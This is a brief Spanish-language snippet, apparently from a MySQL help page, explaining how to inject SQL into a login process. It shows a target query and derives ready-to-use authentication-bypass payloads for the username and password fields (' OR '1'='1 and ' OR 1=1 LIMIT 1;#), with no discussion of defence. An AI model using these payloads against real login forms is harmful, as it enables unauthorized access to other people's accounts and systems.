sql >> Base de Datos >  >> RDS >> Mysql

cómo inyectar sql en el proceso de inicio de sesión

Comenzando con la consulta de objetivo:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Obtenemos que el nombre de usuario es ' OR '1'='1 y la contraseña es ' OR 1=1 LIMIT 1;#